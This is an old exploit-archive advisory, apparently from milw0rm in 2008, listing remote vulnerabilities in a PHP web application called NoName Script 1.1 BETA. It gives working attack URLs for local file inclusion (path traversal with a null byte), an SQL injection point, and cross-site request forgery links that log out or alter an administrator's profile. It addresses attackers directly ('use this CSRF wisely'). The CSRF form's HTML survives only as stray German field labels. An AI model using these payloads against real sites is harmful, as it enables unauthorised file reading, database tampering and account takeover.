################################################################################ [+] NoName Script 1.1 BETA Multiple Remote Vulnerabilities [+] Discovered By SirGod [+] www.mortal-team.org [+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,MesSiAH,xZu,HrN,kemrayz ################################################################################# [+] Local File Inclusion http://localhost/index.php?action=../../../autoexec.bat%00&kategorie=Tutorial This will open autoexec.bat . [+] SQL Injection http://localhost/index.php?action=newsadmindel&file_id=[SQL] [+] Cross Site Request Forgery If an logged in user with administrative permisions will click the following link ,he will be logged out. http://localhost/logout.php [+] Cross Site Request Forgery - Change User Profile If an logged in user with administrative permisions will click the following link the following action will be executed. What to change : - form action and profil_id :
action : change http://localhost with the website link. profil_id : id of the user that you want to change settings for it - input value : value : your name (corresponding to ID) And now edit the other settings change via web browser.After that,use this CSRF wisely. [+] Here is the HTML code :
Benutzerinformationen
Benutzername: 
Benutzergruppe: 
Zusätzliche Informationen
Geschlecht: 
Geburtstag: 
Benutzertext: 
Homepage: 
Instant Messaging
ICQ-Nummer: 
MSN-Name: 
AIM-Name: 
Verwarnungen
  Admin wurde noch nicht verwarnt.
Aktion:  Verwarnungen verwalten
 
 
################################################################################# # milw0rm.com [2008-08-23]